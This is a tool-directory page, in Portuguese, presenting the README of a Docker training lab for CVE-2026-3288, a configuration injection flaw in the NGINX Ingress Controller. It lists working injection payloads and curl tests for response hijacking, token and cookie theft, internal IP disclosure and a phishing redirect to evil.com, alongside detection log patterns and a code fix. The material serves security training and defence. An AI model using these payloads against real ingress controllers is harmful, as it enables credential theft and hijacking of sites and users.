Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-3288-lab — # Laboratório vulnerável baseado em Docker para CVE-2026-3288 NGINX Ingress configuration injection, com scripts de exploração, monitoramento de detecção e orientação de remediação para treinamento de segurança autorizado. | Kitploit
Ferramentas/GitHubGitHub/bvabhishek/cve-2026-3288-lab
Segurança de Infraestrutura em NuvemSegurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAuditoria de ConfiguraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

# Laboratório vulnerável baseado em Docker para CVE-2026-3288 NGINX Ingress configuration injection, com scripts de exploração, monitoramento de detecção e orientação de remediação para treinamento de segurança autorizado.

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-3288 Vulnerable Lab (Docker)

Injeção de Configuração no NGINX Ingress Controller

⚠️ AVISO: Este laboratório contém configurações intencionalmente vulneráveis para TREINAMENTO DE SEGURANÇA AUTORIZADO APENAS

Visão Geral da Vulnerabilidade

CVE-2026-3288 (CVSS 8.8 ALTA) - Injeção de configuração no NGINX Ingress Controller

  • Versões Afetadas: < v1.13.8, v1.14.4, v1.15.0
  • Vetor de Ataque: Injeção de aspas duplas (") na configuração de caminho
  • Impacto: Execução Remota de Código, Divulgação de Segredos, Roubo de Credenciais
  • Relacionado: CVE-2026-24512 (injeção de caminho semelhante)

Causa Raiz

A função buildProxyPass() não sanitiza a entrada de caminho antes de interpolá-la na configuração do nginx, permitindo que atacantes escapem de strings entre aspas e injetem diretivas arbitrárias do nginx.

Componentes do Laboratório

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # Este arquivo
├── docker-compose.yml                 # Configuração principal do laboratório
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # Configuração NGINX vulnerável
│   │   ├── nginx.conf                # Configuração base
│   │   └── vulnerable-config.conf    # Tratamento de caminho vulnerável
│   └── backend/
│       ├── Dockerfile                # Aplicação backend simples
│       └── app.py                    # Aplicação Flask
├── exploits/
│   ├── exploit.py                    # Script de exploração automatizado
│   ├── payloads.txt                  # Coleção de payloads de exploração
│   └── test-exploits.sh              # Testa todos os exploits
├── detection/
│   └── monitor-logs.sh               # Monitora tentativas de exploração
└── cleanup/
    └── cleanup.sh                    # Remove todos os recursos do laboratório

Pré-requisitos

  • Docker instalado
  • Docker Compose instalado
  • Python 3.6+ (para scripts de exploração)
  • curl ou wget
  • Mínimo de 2GB de RAM

Início Rápido

1. Iniciar o Laboratório

root@kitploit:~
cd CVE-2026-3288-lab

# Iniciar ambiente vulnerável
docker-compose up -d

# Verificar status
docker-compose ps

2. Verificar Instalação

root@kitploit:~
# Testar se o backend está em execução
curl http://localhost:8080/

# Testar se o NGINX está em execução
curl http://localhost/

3. Executar Exploits

root@kitploit:~
cd exploits

# Exploração automatizada
python3 exploit.py --all

# Ou testar exploits individuais
bash test-exploits.sh

4. Monitorar Logs

root@kitploit:~
# Observar logs do NGINX para exploração
docker-compose logs -f nginx

# Monitorar detecção
cd detection
bash monitor-logs.sh

5. Limpeza

root@kitploit:~
docker-compose down -v

Cenários de Ataque

Cenário 1: Sequestro de Resposta

Injetar diretiva return do nginx para servir conteúdo controlado pelo atacante.

Payload:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

Teste:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

Cenário 2: Roubo de Credenciais

Refletir cabeçalhos de Authorization na resposta para roubar tokens Bearer.

Payload:

root@kitploit:~
/login" return 200 "Token: $http_authorization

Teste:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

Cenário 3: Redirecionamento de Phishing

Redirecionar usuários para site de phishing controlado pelo atacante.

Payload:

root@kitploit:~
/" return 302 "https://evil.com/phishing

Teste:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

Cenário 4: Divulgação de IP Interno

Vazar informações internas do servidor.

Payload:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

Teste:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

Cenário 5: Roubo de Cookies

Roubar cookies de sessão.

Payload:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

Teste:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

Como Funciona

Padrão de Código Vulnerável

root@kitploit:~
# Configuração vulnerável
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

Exploração

Quando o caminho contém ", ele quebra a string entre aspas:

root@kitploit:~
# Entrada do atacante: /api" return 200 "HACKED
# Resulta em:
location ~ "^/api" return 200 "HACKED" {
    # A configuração original agora está quebrada
}

Detecção

Monitoramento de Logs

root@kitploit:~
# Observar padrões suspeitos
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

Detecção Manual

root@kitploit:~
# Verificar configuração do NGINX para diretivas injetadas
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

Remediação

Ações Imediatas

  1. Validação de Entrada - Sanitizar todas as entradas de caminho
  2. Escapar Caracteres Especiais - Escapar corretamente " e \
  3. Usar Allowlists - Permitir apenas caminhos conhecidos como seguros
  4. Monitorar Logs - Alertar sobre padrões suspeitos

Correção de Código

root@kitploit:~
// Antes (vulnerável)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// Depois (corrigido)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

Objetivos de Aprendizado

Após concluir este laboratório, você entenderá:

  1. ✅ Como funcionam as vulnerabilidades de injeção de configuração
  2. ✅ O impacto da sanitização insuficiente de entrada
  3. ✅ Múltiplas técnicas de exploração
  4. ✅ Métodos de detecção via análise de logs
  5. ✅ Estratégias adequadas de remediação

Solução de Problemas

Containers não iniciam

root@kitploit:~
# Verificar logs
docker-compose logs

# Reiniciar
docker-compose restart

Porta já em uso

root@kitploit:~
# Alterar portas no docker-compose.yml
# Ou parar serviços conflitantes
sudo lsof -i :80

Exploits não funcionam

root@kitploit:~
# Verificar se o NGINX está em execução
docker-compose ps nginx

# Verificar configuração do NGINX
docker exec cve-2026-3288-nginx nginx -t

Aviso de Segurança

  • ⚠️ SOMENTE usar em ambientes de laboratório isolados
  • ⚠️ NUNCA implantar em sistemas de produção
  • ⚠️ NUNCA expor à internet
  • ⚠️ Garantir autorização adequada antes de testar
  • ⚠️ Seguir práticas de divulgação responsável

Referências

  • Advisory CVE-2026-3288
  • PR de Correção #14667
  • Análise Sysdig

Criado apenas para fins autorizados de treinamento e pesquisa em segurança

Baixar ferramenta